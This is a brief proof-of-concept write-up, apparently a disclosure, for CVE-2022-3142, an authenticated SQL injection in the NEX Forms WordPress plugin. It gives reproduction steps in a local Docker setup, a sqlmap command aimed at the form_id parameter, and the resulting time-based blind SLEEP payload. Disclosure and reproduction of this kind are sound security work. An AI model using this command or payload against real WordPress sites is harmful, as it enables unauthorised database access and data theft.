Authenticatd SQL injection vulnerability in the "NEX Forms" Wordpress plugin
This vulnerability has been assigned CVE-2022-3142.
https://nvd.nist.gov/vuln/detail/CVE-2022-3142
-
Start a new Wordpress instance using docker-compose.
-
Install the NEX Forms plugin.
-
Open the URL
/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1
in your browser. Save the request tonex-forms-req.txt
via Burp Suite. -
Execute the following command:
sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap
will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)